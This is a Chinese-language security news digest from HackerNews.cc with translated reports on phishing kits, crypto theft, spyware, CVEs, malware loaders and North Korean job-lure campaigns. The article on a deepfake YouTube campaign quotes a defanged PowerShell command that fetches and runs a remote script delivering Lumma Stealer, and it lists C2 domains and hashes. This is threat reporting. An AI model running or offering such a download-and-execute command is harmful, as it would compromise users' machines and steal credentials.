HackerNews

HackerNews 编译，转载请注明出处： 网络犯罪分子现在可以利用 Darcula PhaaS 平台的最新版本 v3，在几分钟内克隆任何品牌的网站，进一步降低了大规模实施网络钓鱼攻击所需的技术门槛。 这一最新版本的网络钓鱼工具 “代表着犯罪能力的重大转变，降低了坏人针对任何品牌发起复杂、可定制网络钓鱼活动的门槛，” 网络安全公司 Netcraft 在一份新分析报告中指出。 Netcraft 表示，自 2024 年 3 月底首次曝光 Darcula 以来，已检测并阻止了超过 95,000 个新的 Darcula 网络钓鱼域名、近 31,000 个 IP 地址，并关闭了超过 20,000 个欺诈网站。 Darcula 最大的变化是允许任何用户按需生成任何品牌的网络钓鱼工具包。 “新的重制版本现已准备好进行测试，” 该服务的核心开发人员于 2025 年 1 月 19 日在一个拥有超过 1,200 名订阅者的 Telegram 频道中发布消息表示。 “现在，你还可以自己定制前端。使用 darcula-suite，你可以在 10 分钟内完成前端的制作。” 要做到这一点，客户只需在网页界面中提供要冒充品牌的 URL，平台将使用浏览器自动化工具（如 Puppeteer）导出 HTML 和所有所需资源。 用户随后可以选择要替换的 HTML 元素并注入网络钓鱼内容（例如支付表单和登录字段），使其与品牌登陆页面的外观和感觉相匹配。生成的网络钓鱼页面随后上传到管理面板。 “像任何 SaaS 产品一样，darcula-suite PhaaS 平台提供管理仪表板，使欺诈者可以轻松管理他们的各种活动，” 安全研究员 Harry Freeborough 表示。 “一旦生成，这些工具包将上传到另一个平台，犯罪分子可以在该平台上管理他们的活跃活动、查找提取的数据并监控已部署的网络钓鱼活动。” 除了提供展示网络钓鱼活动聚合性能统计信息的仪表板外，Darcula v3 还进一步提供了一种方法，将被盗的信用卡详细信息转换为受害者的虚拟卡片图像，可以扫描并添加到数字钱包中用于非法目的。具体来说，这些卡片被加载到一次性手机上并出售给其他犯罪分子。 该工具目前处于内部测试阶段。在 2025 年 2 月 10 日的后续帖子中，恶意软件作者发布消息表示：“我最近很忙，所以 v3 更新将推迟几天。”   消息来源：The Hacker News； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 苹果公司周五宣布，由于英国政府要求获得加密用户数据的后门访问权限，将立即在英国移除 iCloud 的高级数据保护（ADP）功能。 据彭博社首次报道，ADP 是 iCloud 的一个可选设置，确保用户的受信任设备唯一持有用于解锁存储在云端数据的加密密钥。这包括 iCloud 备份、照片、笔记、提醒、Safari 书签、语音备忘录以及与苹果自家应用相关的数据。 “鉴于数据泄露和其他对客户隐私的威胁不断增加，我们对无法在英国为客户提供 ADP 保护感到非常失望，”苹果公司被引用对彭博社表示。“ADP 通过端到端加密保护 iCloud 数据，这意味着数据只能由拥有它的用户在其受信任设备上解密。” 据报道，已经使用 ADP 的用户需要在尚未指定的时间内手动禁用该功能，因为苹果“无法代表他们自动禁用它。” 这一前所未有的举措仅在数周前，有报道称英国政府已下令苹果建立后门以访问任何苹果用户的 iCloud 内容。 据《华盛顿邮报》报道，该要求由英国内政部根据《调查权力法》（IPA），也称为《窥探者宪章》，发出，“要求全面能力以查看完全加密的材料，而不仅仅是协助破解特定账户。” 随着在该地区移除 ADP，苹果现在只为 iCloud 提供标准数据保护，该保护加密用户数据但将加密密钥存储在其自己的数据中心，从而使执法部门在获得搜查令的情况下可以访问这些数据。 上周，美国参议员罗恩·怀登和众议员安迪·比格斯致函国家情报总监图尔西·加巴德，敦促英国撤回其命令，称这威胁到美国人民和美国政府的隐私和安全。 “如果英国不立即逆转这一危险行为，我们敦促你重新评估美英网络安全安排和项目以及美国与英国的情报共享，”他们补充道。   消息来源：The Hacker News； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 加密货币交易所 Bybit 周五披露，一起“复杂”的攻击导致其一个以太坊冷（离线）钱包中的超过 14.6 亿美元的加密货币被盗，这成为有史以来最大的单次加密货币盗窃案。 Bybit 在 X 上的一篇帖子中表示：“此次事件发生在我们的 ETH 多签冷钱包向热钱包执行转账时。不幸的是，这笔交易通过一种复杂的攻击被操纵，该攻击掩盖了签名界面，显示正确的地址的同时修改了底层的智能合约逻辑。” “结果，攻击者能够控制受影响的 ETH 冷钱包，并将其资产转移到一个未知地址。” Bybit 首席执行官 Ben Zhou 在社交媒体平台上发布的另一份声明中强调，所有其他冷钱包都是安全的。公司进一步表示已向有关部门报告了此案。 虽然 Bybit 尚未正式确认，但 Elliptic 和 Arkham Intelligence 确认这起数字盗窃案是由臭名昭著的 Lazarus Group 所为。这起事件成为迄今为止报告的最大加密货币盗窃案，超过了 Ronin Network（6.24 亿美元）、Poly Network（6.11 亿美元）和 BNB Bridge（5.86 亿美元）的盗窃案。 独立研究员 ZachXBT 表示，他们“将 Bybit 黑客攻击与 Phemex 黑客攻击联系起来”，后者发生在上个月末。 这个总部位于朝鲜的威胁行为体是最多产的黑客组织之一，策划了数十起加密货币盗窃案，为受制裁的国家生成非法收入。去年，谷歌将朝鲜描述为“可以说是世界上领先的网络犯罪企业”。 2024 年，据估计该组织在 47 起加密货币攻击中窃取了 13.4 亿美元，占该时期所有非法加密货币的 61%，区块链情报公司 Chainalysis 表示。 谷歌旗下的 Mandiant 上个月表示：“由于加密货币劫案的高收益、归因于恶意行为者的挑战以及许多组织对加密货币和 Web3 技术的初步熟悉，加密货币劫案正在增加。”   消息来源：The Hacker News； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 新一波的 “自骗” 攻击浪潮正在利用 AI 生成的深度伪造视频和恶意脚本，目标锁定加密货币爱好者和金融交易者，标志着社会工程战术的危险演变。 据网络安全研究公司 Gen Digital 发现，这场活动利用经过验证的 YouTube 频道、合成人物和 AI 制作的有效载荷，操纵受害者主动破坏自己的系统。 这种攻击在 2024 年第三季度激增了 614%，结合了尖端的深度伪造技术和精心设计的心理诱饵，引发了对生成式 AI 在网络犯罪中武器化的紧迫担忧。 安全分析师指出，该操作始于一个托管在拥有 11 万订阅者的被攻陷 YouTube 频道上的深度伪造视频。 视频中出现了一个名为 “托马斯・哈里斯” 或 “托马斯・罗伯茨” 的合成人物，利用先进的面部动画、语音合成和身体动作复制技术制作而成。 尽管该频道看起来合法，包括从 TradingView 重新发布的内 容，但未列出的教程视频指导观众激活一个虚构的 “AI 驱动的开发者模式”，声称该模式可以以 97% 的准确率预测加密货币市场趋势。 攻击的核心在于使用 AI 生成的脚本设计来规避怀疑。观众被引导打开 Windows 的运行对话框（Win+R）并执行一个从 paste-sharing 网站（如 Pastefy[.]com 或 Obin[.]net）获取恶意脚本的 PowerShell 命令。 研究人员解密的一个代表性有效载荷显示攻击者使用 ChatGPT 来优化他们的代码： iex (New-Object Net.WebClient).DownloadString(‘hxxps://pastefy[.]com/raw/AbCdE123’) 该脚本连接到一个命令与控制（C&C）服务器——最近被追踪为 developer-update[.]dev 或 developerbeta[.]dev——以部署 Lumma Stealer 或 NetSupport 远程访问工具。 前者窃取加密货币钱包和浏览器凭据，而后者则授予对系统的完全控制。取证分析揭示了关键组件的 SHA-256 哈希值，包括： a5e0635363bbb5d22d5ffc32d9738665942abdd89d2e6bd1784d6a60ac521797（恶意 PowerShell 脚本） 2fe60aa1db2cf7a1dc2b3629b4bbc843c703146f212e7495f4dc7745b3c5c59e（Lumma Stealer 变种） 至关重要的是，深度伪造视频通过程序细节隐藏了其人工性质——一个合成声音解释了如何通过添加注册表排除项来绕过 Windows Defender，而屏幕上的按键操作则模仿了真实的 TradingView 工作流程。 攻击者还通过 YouTube 的赞助广告系统进一步扩大了攻击范围，针对观看合法金融内容的用户。 与传统的网络钓鱼不同，受害者主动参与了他们的系统被破坏的过程，认为他们正在访问独家工具。随着网络犯罪分子现在正在自动化人物创建和脚本优化，通过多个渠道验证数字指令已成为一种不可或缺的安全实践。   消息来源：Cybersecurity News； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 移动设备安全公司 iVerify 的新发现表明，强大的零点击间谍软件的使用范围比之前理解的更为广泛，不仅影响民间社会成员，还波及企业高管。 iVerify 在周三宣布，仅在 12 月份，就在其测试的 18,000 台唯一设备中检测到了 11 台感染了 “飞马” 间谍软件。 iVerify 此前在 12 月份表示，自 5 月份首次提供诊断扫描服务以来，在提交测试的 3,000 部手机中发现了 7 部感染了 “飞马” 间谍软件。关于这些检测的新闻报道导致 iVerify 的威胁狩猎应用程序的使用范围更广，涵盖了更主流的用户群体。 该公司描述的最新受害者均在私营行业工作，包括房地产、物流和金融领域，只有一位是欧洲政府官员。愿意透露其所在地的受害者来自瑞士、波兰、巴林、西班牙、捷克共和国和亚美尼亚。 “飞马” 间谍软件由以色列公司 NSO Group 制造，多年来一直面临质疑，因为尽管该公司声称其产品仅出售给针对犯罪分子和恐怖分子的政府，但该间谍软件仍频繁出现在民间社会的手机中。零点击间谍软件无需与设备所有者直接交互即可安装。 iVerify 应用程序下载费用为 1 美元，用户可以每月扫描一次手机，检测高级商业间谍软件。设备所有者只需按照几个简单的步骤创建一个诊断文件，iVerify 将在几小时内完成评估。 该公司的扫描通过查找恶意软件签名并部分依赖机器学习来发现间谍软件感染的迹象和设备中的异常情况。 据 iVerify 称，新确认的检测发现了 2021-2023 年间的已知 “飞马” 变种，许多受害者被多种变种攻击。iVerify 表示，有些受害者被监视了数年。 iVerify 表示，仍在研究多个额外案例，这些案例中的法医痕迹表明可能存在潜在攻击。 企业高管成为 “飞马” 间谍软件的目标，为这场间谍软件危机增添了新的维度。这些高管可以接触到秘密的公司计划、财务数据，并且经常与其他在幕后进行敏感工作的有影响力的私营部门领导人交流，包括那些可能影响金融市场的交易。 迄今为止，大多数已知的 “飞马” 感染案例涉及记者、人权活动家、政治家和其他民间社会成员。 “从安全角度来看，世界对这种情况完全没有准备，” iVerify 联合创始人、前国家安全局分析师 Rocky Cole 在采访中表示。“这种情况比人们想象的要普遍得多。” Cole 表示，在最近的扫描中，只有一半被发现感染了 “飞马” 间谍软件的手机用户收到了苹果公司的威胁通知。 Cole 表示，公司只报告了 “真正阳性” 的 “飞马” 检测结果，并未包括那些无法通过独立外展验证身份的用户。 iVerify 还测试了其他类型的间谍软件，包括 Paragon（Graphite）、QuaDream（Reign）和 Intellexa（Predator）的产品，但这项新研究仅包括感染了 “飞马” 间谍软件的手机检测结果。   消息来源：The Record；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 美国媒体公司Lee企业（Lee Enterprises）公布了最近一次网络攻击的更多细节，透露攻击者加密并窃取了文件。 Lee企业在 25 个州拥有 350 家周报和专业出版物。据新闻自由追踪器报道，至少有 75 家报纸受到了网络攻击的影响。 Lee企业首次向美国证券交易委员会（SEC）报告网络攻击时，表示由于 “网络安全事件”，公司在 2 月 3 日遭遇了技术故障。其许多出版物的运营受到了影响，包括印刷报纸、订阅账户和内部服务。 在周二向 SEC 提交的更新中，Lee企业没有明确表示遭受了勒索软件攻击，但根据目前的调查，威胁行为者侵入了其网络，加密了关键应用程序并窃取了某些文件，这符合典型的勒索软件攻击特征。 Lee企业正在进行法医分析，以确定是否有个人或敏感信息因黑客攻击而泄露。 “此次事件影响了公司的运营，包括产品分发、账单、收款和供应商付款。我们产品组合中的印刷出版物分发出现了延迟，在线运营也部分受限，” Lee企业向 SEC 表示。 该公司补充说：“截至 2025 年 2 月 12 日，所有核心产品已恢复正常分发节奏，但周报和附属产品尚未恢复。这些产品占公司总运营收入的 5%。公司预计将在未来几周内逐步恢复这些业务。” 这家媒体巨头预计此次事件将产生重大影响，但财务影响的全部范围尚未确定。 SecurityWeek 尚未发现任何已知的勒索软件组织声称对此次攻击负责。 目前尚不清楚Lee企业是否支付了赎金或正在考虑这一选项，但公司指出，它确实拥有一份 “全面的网络安全保险政策，涵盖与事件响应、法医调查、业务中断和监管罚款相关的费用，但需遵守保单限额和免赔额”。   消息来源：Security Week；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 赛门铁克（Symantec），博通（Broadcom）的一个部门，已解决了其诊断工具（SymDiag）中的一个关键安全漏洞（CVE-2025-0893），该漏洞可能允许攻击者在受影响的系统上提升权限。 该漏洞影响 SymDiag 3.0.79 之前的版本，由于其可能通过本地利用威胁机密性、完整性和可用性，因此获得了 CVSSv3 7.8（高严重性）的评分。 该漏洞源于 SymDiag 的权限管理不当，这是一个用于排查赛门铁克产品（如 Web 安全服务（WSS）代理）问题的工具。 具有低权限访问的攻击者可以利用此漏洞以提升的权限执行任意代码，从而有效绕过安全控制。 该问题特别影响 SymDiag 与 WSS 代理交互的系统，WSS 代理是赛门铁克安全 Web 网关（SWG）解决方案的一个组件，用于流量重定向和云安全强制执行。 根据博通的咨询，该漏洞存在于 SymDiag 在收集诊断数据期间处理进程提升的方式中。 成功的利用可能使未经授权访问敏感系统资源、修改安全配置或中断终端保护服务。 尽管尚未记录任何公开利用，但 SymDiag 的诊断功能与 WSS 代理的网络级权限相结合，如果未修补，将创建高风险场景。 缓解和补丁部署 赛门铁克已在 SymDiag 3.0.79 中解决了此问题，该版本已通过赛门铁克终端保护管理器（SEPM）自动部署到所有受影响的终端。 更新移除了旧的易受攻击版本的 SymDiag，确保使用托管部署的企业客户无需手动干预。 对于独立安装，建议用户通过工具的界面或命令行实用程序验证其 SymDiag 版本。 虽然补丁缓解了 immediate risk，但博通强调了更广泛的安全强化措施： 最小权限原则：限制管理访问仅限授权人员，并对终端管理工具实施基于角色的访问控制（RBAC）。 网络分段：隔离管理接口并限制远程访问仅限受信任的 IP 范围。 深度防御：部署入侵检测系统（IDS）和终端检测与响应（EDR）工具，以监控异常活动，特别是在使用旧版 WSS 代理配置的环境中。 CVE-2025-0893 对使用 SymDiag 与赛门铁克 WSS 代理结合的组织构成了针对性但严重的风险。 迅速的补丁部署展示了博通对其零信任路线图的承诺，尽管管理员应审计旧系统以查找潜在的残留漏洞。 随着云安全工具越来越多地处理解密流量和特权操作，供应商必须在诊断功能与严格的访问控制之间取得平衡，以防止在违规情况下发生横向移动。   消息来源：Cybersecurity News； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 诺顿（Norton）通过一系列集成在其诺顿网络安全产品中的 AI 驱动功能，为诈骗防护设定了新标准，帮助人们抵御当今最普遍的网络威胁。 诈骗如同多米诺骨牌的第一块倾倒，会引发一系列严重攻击，包括身份盗窃和金融欺诈。该公司报告称，如今 90% 的网络威胁源自诈骗和社会工程威胁，这一数字自 2021 年以来几乎增加了三倍。 从今天起，Genie Scam Protection 和 Genie Scam Protection Pro 在美国的诺顿网络安全产品系列中上线，提供 AI 防护，覆盖短信、电话、电子邮件和网络等诈骗高发领域。诺顿 Genie AI 如同侦探寻找线索一样，分析词语的含义而不仅仅是链接，以发现即使最谨慎的人也可能忽略的隐藏诈骗模式。诺顿最全面的计划——带有 LifeLock Ultimate Plus 的 Norton 360，还提供诈骗支持和赔偿保障，为用户提供更大的安心。 2023 年，诺顿推出了首个使用 AI 对可疑消息和图像进行实时分析的应用程序——Norton Genie。随着数百万人使用 Norton Genie 获取关于潜在诈骗的即时帮助和建议，为 Genie 提供支持的 AI 不断学习，变得更加有效。现在，随着增强的 Genie Scam Protection 直接集成到诺顿计划中，诺顿提供了全面的“设置后无需操心”的诈骗防护，主动帮助人们在互联世界中保持安全。 “如今的诈骗不再是肉眼一眼就能识破的那种，”Gen 的首席产品官 Leena Elias 表示。“诈骗者利用 AI 加速他们的计划，使其更具可信度。再加上我们每天收到的大量电子邮件、短信和电话，显然我们需要技术来帮助我们避免成为下一个诈骗受害者。我们已在诺顿产品中直接构建了增强的 AI 驱动诈骗防护，为客户提供强大、始终在线的诈骗防御，以保护他们的数字和金融安全。我们的顶级计划通过主动诈骗防护以及诈骗支持和赔偿来帮助保护您，如果您不幸成为诈骗的受害者，这些支持和赔偿可以帮助您恢复原状。” Genie Scam Protection 功能作为诺顿网络安全产品的一部分，在桌面和移动设备上免费提供，包括 Norton AntiVirus Plus、Norton Mobile Security 和 Norton 360 计划。主要功能包括： 安全短信：利用诺顿 Genie AI 检测短信中的复杂诈骗，通过分析诈骗者使用的词语含义。仅在移动设备上提供，这是您最需要的地方。 安全网络：在在线购物或浏览时提供先进的 AI 骗局防护。 Genie AI 驱动的诈骗助手：集成诺顿 Genie AI 应用程序，只需一键即可提供关于诈骗和可疑优惠的即时指导。 诺顿隐私浏览器：阻止网络钓鱼诈骗和烦人的广告，帮助人们自信地浏览、银行和购物。此功能可在诺顿隐私浏览器的桌面版本上使用。 除了 Genie Scam Protection 之外，使用带有 LifeLock 的 Norton 360 的客户还拥有 Genie Scam Protection Pro，其中包括： 安全通话：利用 AI 自动阻止诈骗电话，或将来电标记为诈骗、垃圾电话或业务电话，让人们知道是否应该接听。 诈骗支持和赔偿：获得帮助追回因诈骗而损失的钱款。专门的向导将协助追回丢失的资金。 安全电子邮件：主动扫描电子邮件，使用诺顿 Genie AI 检测隐藏的诈骗模式，并在发现可疑情况时发出警告，帮助在打开邮件之前发现复杂诈骗。 新的 Genie Scam Protection 和 Scam Protection Pro 功能今天在美国支持的平台上上线。英国、澳大利亚和新西兰的诺顿网络安全计划也将收到 Genie Scam Protection 绑定包中的所有功能。   消息来源：Help Net Security； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 美国卫生网联邦服务公司（HNFS）及其母公司 Centene Corporation 已同意支付 1125 万美元和解金，以解决 HNFS 被指控在其国防卫生局（DHA）TRICARE 合同下虚假认证符合网络安全要求的指控。 美国政府与 HNFS 签订合同，由其为 TRICARE 北区提供管理式医疗支持服务，覆盖 22 个州。 合同要求遵守网络安全标准，特别是 48 C.F.R. § 252.204-7012 以及 NIST 特别出版物 800-53（联邦信息系统和组织的安全与隐私控制）中的 51 项安全控制措施。 根据美国司法部的公告，在 2015 年至 2018 年期间，HNFS 被指控在为美国军人及其家庭管理健康福利时，未能实施所需的网络安全措施。 与此同时，司法部声称 HNFS 在向 DHA 提交的报告中虚假认证合规，使其看起来像是充分保护了人们的数据，而实际上并未做到。 具体而言，HNFS 未能采取以下措施： 扫描其系统中的已知漏洞并及时修复。 考虑审计报告中突出的网络安全风险并采取行动进行补救。 实施行业标准的资产管理、访问控制、防火墙保护和补丁管理。 避免使用过时的硬件和软件。 遵循强账户密码策略。 在和解协议文件中，美国政府指出 HNFS 至少在三个场合虚假认证合规：2015 年 11 月 17 日、2016 年 2 月 26 日和 2017 年 2 月 24 日。 HNFS 和 Centene 否认所有指控，并坚称没有发生数据泄露或军人信息丢失。然而，他们仍同意支付 1125 万美元和解金以解决指控。 法律文件明确指出，如果未来出现额外证据、行政处罚或民事诉讼，和解协议并不保护 HNFS 和 Centene 免受刑事责任。   消息来源：Bleeping Computer； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： Citrix 已发布安全更新，修复了一个影响 NetScaler 控制台（原 NetScaler ADM）和 NetScaler 代理的高严重性安全漏洞，该漏洞在特定条件下可能导致权限提升。 该漏洞被追踪为 CVE-2024-12284，CVSS v4 评分为 8.8（满分 10.0）。 该漏洞被描述为权限管理不当，如果 NetScaler 控制台代理已部署，可能会导致已认证的权限提升，允许攻击者执行受损后的操作。 “该问题源于权限管理不足，可能被已认证的恶意行为者利用，无需额外授权即可执行命令，” NetScaler 指出。 “然而，只有已认证且已有权访问 NetScaler 控制台的用户才能利用此漏洞，从而将威胁面限制在已认证用户范围内。” 网络安全 受影响的版本如下： NetScaler 控制台 14.1 低于 14.1-38.53 NetScaler 控制台 13.1 低于 13.1-56.18 NetScaler 代理 14.1 低于 14.1-38.53 NetScaler 代理 13.1 低于 13.1-56.18 以下软件版本已修复该漏洞： NetScaler 控制台 14.1-38.53 及更高版本 NetScaler 控制台 13.1-56.18 及更高版本 NetScaler 代理 14.1-38.53 及更高版本 NetScaler 代理 13.1-56.18 及更高版本 “Cloud Software Group 强烈建议 NetScaler 控制台和 NetScaler 代理的客户尽快安装相关更新版本，” 该公司表示，并补充说没有解决方法可以修复此漏洞。 不过，使用 Citrix 托管的 NetScaler 控制台服务的客户无需采取任何行动。   消息来源：The Hacker News；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 据观察，一场传播 XLoader 恶意软件的恶意活动利用了与 Eclipse 基金会相关的合法应用程序，采用了 DLL 侧载技术。 “此次攻击中使用的合法应用程序 jarsigner，是在安装 Eclipse 基金会分发的 IDE 软件包过程中创建的文件，它是一种用于签署 JAR（Java 归档）文件的工具。” AhnLab 安全情报中心（ASEC）表示。 这家韩国网络安全公司指出，该恶意软件以压缩的 ZIP 压缩包形式传播，其中包含合法的可执行文件以及用于侧载以启动恶意软件的 DLL 文件： Documents2012.exe：合法的 jarsigner.exe 二进制文件的重命名版本 jli.dll：由威胁行为者修改的 DLL 文件，用于解密并注入 concrt140e.dll concrt140e.dll：XLoader 载荷 当运行 “Documents2012.exe” 时，攻击链进入恶意阶段，触发修改后的 “jli.dll” 库的执行，从而加载 XLoader 恶意软件。 “分发的 concrt140e.dll 文件是一个加密的载荷，在攻击过程中解密，并注入到合法文件 aspnet_wp.exe 中执行，” ASEC 说道。 “注入的恶意软件 XLoader 窃取用户的 PC 和浏览器信息等敏感信息，并执行下载其他恶意软件等各种活动。” 作为 Formbook 恶意软件的后续版本，XLoader 于 2020 年首次在野外被发现。它以恶意软件即服务（MaaS）模式出售给其他犯罪分子。2023 年 8 月，一种伪装成 Microsoft Office 的 macOS 版信息窃取程序和键盘记录器被发现。 Zscaler ThreatLabz 在本月发布的两部分报告中表示：“XLoader 6 和 7 版本增加了额外的混淆和加密层，旨在保护关键代码和信息，以规避基于签名的检测并增加逆向工程的难度。” 进一步分析显示，XLoader 采用了之前在 SmokeLoader 中观察到的技术，包括在运行时加密部分代码和规避 NTDLL 钩子。 对恶意软件的进一步分析还发现，它使用了硬编码的诱饵列表，将真实的命令与控制（C2）网络通信与合法网站的流量混合在一起。诱饵和真实的 C2 服务器都使用不同的密钥和算法进行了加密。 就像 Pushdo 等恶意软件家族一样，使用诱饵的目的是生成到合法域名的网络流量，以掩盖真实的 C2 流量。 DLL 侧载还被 SmartApeSG（又名 ZPHP 或 HANEYMANEY）威胁行为者滥用，通过被 JavaScript 网页注入破坏的合法网站传递 NetSupport RAT，远程访问木马作为传递 StealC 窃取器的通道。 随着 Zscaler 详细介绍了另外两个名为 NodeLoader 和 RiseLoader 的恶意软件加载器，它们被用于传播各种信息窃取程序、加密货币矿机和僵尸网络恶意软件，如 Vidar、Lumma、Phemedrone、XMRig 和 Socks5Systemz。 “RiseLoader 和 RisePro 在其网络通信协议的多个方面存在相似之处，包括消息结构、初始化过程和载荷结构，” 它指出，“这些重叠可能表明两个恶意软件家族背后是同一个威胁行为者。”   消息来源：The Hacker News；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 自由职业软件开发者正成为一项持续活动的目标，该活动利用以工作面试为主题诱饵来传播跨平台恶意软件家族，即BeaverTail和InvisibleFerret。据《黑客新闻》报道，这一与朝鲜有关的活动被命名为“欺骗性开发”（DeceptiveDevelopment），与被追踪为“传染性面试”（Contagious Interview，又称CL-STA-0240）、DEV#POPPER、著名千里马（Famous Chollima）、PurpleBravo和坚韧的蓬山（Tenacious Pungsan）的集群有重叠。该活动自2023年底以来一直在进行。 “‘欺骗性开发’通过在求职和自由职业网站上进行鱼叉式网络钓鱼，针对自由职业软件开发者，旨在窃取加密货币钱包以及浏览器和密码管理器中的登录信息，”网络安全公司ESET在一份与《黑客新闻》共享的报告中表示。 2024年11月，ESET向《黑客新闻》证实，“欺骗性开发”与“传染性面试”存在重叠，将其归类为一个新的拉撒路集团（Lazarus Group）活动，该活动旨在进行加密货币盗窃。 这些攻击链的特点是利用社交媒体上的虚假招聘人员资料联系潜在目标，并与他们分享托管在GitHub、GitLab或Bitbucket上的特洛伊木马代码库，以工作面试过程为借口部署后门程序。 这些活动的后续版本已经扩展到其他求职平台，如Upwork、Freelancer.com、We Work Remotely、Moonlight和Crypto Jobs List。正如之前所强调的，这些招聘挑战通常涉及修复漏洞或为加密货币相关项目添加新功能。 除了编码测试，这些虚假项目还伪装成加密货币项目、具有区块链功能的游戏以及具有加密货币功能的赌博应用程序。恶意代码通常以单行代码的形式嵌入到良性组件中。 “此外，他们被指示构建并执行项目以进行测试，这就是初始入侵发生的地方，”安全研究员马特耶·哈夫拉内克（Matěj Havránek）表示。“使用的代码库通常是私有的，因此受害者首先被要求提供他们的账户ID或电子邮件地址以获得访问权限，这很可能是为了掩盖恶意活动，避免被研究人员发现。” 实现初始入侵的第二种方法是诱骗受害者安装带有恶意软件的视频会议平台，如MiroTalk或FreeConference。 虽然BeaverTail和InvisibleFerret都具有信息窃取功能，但前者作为后者的下载器。BeaverTail还有两种变体：一种是可嵌入特洛伊木马项目的JavaScript变体，另一种是使用Qt平台构建的本地版本，伪装成会议软件。 InvisibleFerret是一种模块化的Python恶意软件，它检索并执行三个额外的组件： pay：收集信息并充当后门，能够接受攻击者控制服务器的远程命令，记录键盘输入、捕获剪贴板内容、运行shell命令、从挂载的驱动器中窃取文件和数据，以及安装AnyDesk和浏览器模块，并从浏览器扩展和密码管理器中收集信息； bow：负责窃取存储在基于Chromium的浏览器（如Chrome、Brave、Opera、Yandex和Edge）中的登录数据、自动填充数据和支付信息； adc：通过安装AnyDesk远程桌面软件作为持久化机制。 ESET表示，该活动的主要目标是全球范围内从事加密货币和去中心化金融项目的软件开发者，其中芬兰、印度、意大利、巴基斯坦、西班牙、南非、俄罗斯、乌克兰和美国报告了大量目标。 “攻击者不区分地理位置，旨在尽可能多地入侵受害者，以增加成功提取资金和信息的可能性。” 这也在运营商采用的明显较差的编码实践中得到体现，从未能删除开发注释到用于开发和测试的本地IP地址，表明该入侵组织并不关心隐蔽性。 值得注意的是，利用工作面试诱饵是朝鲜各种黑客组织采用的经典策略，其中最突出的是一个长期活动，被称为“梦幻工作”（Operation Dream Job）。 此外，有证据表明，这些威胁行为者还参与了欺诈性的IT工作者计划，朝鲜国民在该计划中以虚假身份申请海外工作，以获取定期薪水，从而为政权的优先事项提供资金。 “‘欺骗性开发’集群是朝鲜相关行为者采用的众多赚钱计划之一，并符合从传统货币转向加密货币的持续趋势，”ESET表示。 “在我们的研究过程中，我们观察到它从原始的工具和技术发展到更高级、更有能力的恶意软件，以及更成熟的技巧来吸引受害者并部署恶意软件。”   消息来源：The Hacker News；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 美国一些最敏感的公司和军事网络可能面临被入侵的风险，研究人员披露了通过信息窃取恶意软件（infostealer malware）广泛窃取凭证的情况。 Hudson Rock 的分析显示，网络犯罪市场上正在出售来自洛克希德·马丁（Lockheed Martin）、波音（Boeing）和霍尼韦尔（Honeywell）以及美国陆军和海军、联邦调查局（FBI）和政府问责办公室（GAO）的泄露凭证。 威胁行为者只需花费 10 美元就可以购买到企业电子邮件和 VPN 账户的访问权限，以及内部开发工具（如 GitHub、Jira、Confluence）和军事训练平台等资产的访问权限。 这些网络犯罪市场使得搜索特定凭证（如 army.mil）变得更加容易，而且通常这些日志还包含用于绕过多因素认证（MFA）的活动会话 cookie，报告称。 即使那些未受信息窃取者影响的组织，如果其合作伙伴、供应商和供应商受到攻击，也可能会被入侵，Hudson Rock 警告。 “每一个被感染的员工都是一个真实的人——可能是从事军事人工智能系统工作的工程师、管理机密合同的采购官员、有权访问关键任务情报的国防分析师，”报告继续说道。 “在某个时候，这些员工在用于工作的设备上下载了恶意软件，这不仅暴露了他们的凭证，还可能暴露了他们的整个数字足迹：浏览历史、自动填充数据、内部文件以及敏感应用程序的会话 cookie。” 黑鸭子（Black Duck）的首席顾问托马斯·理查兹（Thomas Richards）表示，这项研究对美国构成了重大的国家安全风险。 “被盗的数据可能允许对手进入关键网络，并采取措施进一步入侵更多人员和系统，”他指出。 “受影响的用户应立即更改密码，并应启动法证调查，以确定他们是如何被入侵的，以及攻击者是否访问了他们不应访问的信息。” 信息窃取者感染可能来自多种来源，包括网络钓鱼邮件、受感染网站的自动下载、破解/盗版游戏、看似合法的应用程序（如假会议软件）、谷歌广告甚至 YouTube 视频描述。 Hudson Rock 声称，在过去的几年里，它已经识别出超过 3000 万台被信息窃取者感染的计算机。   消息来源：InfoSecurity magazine； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

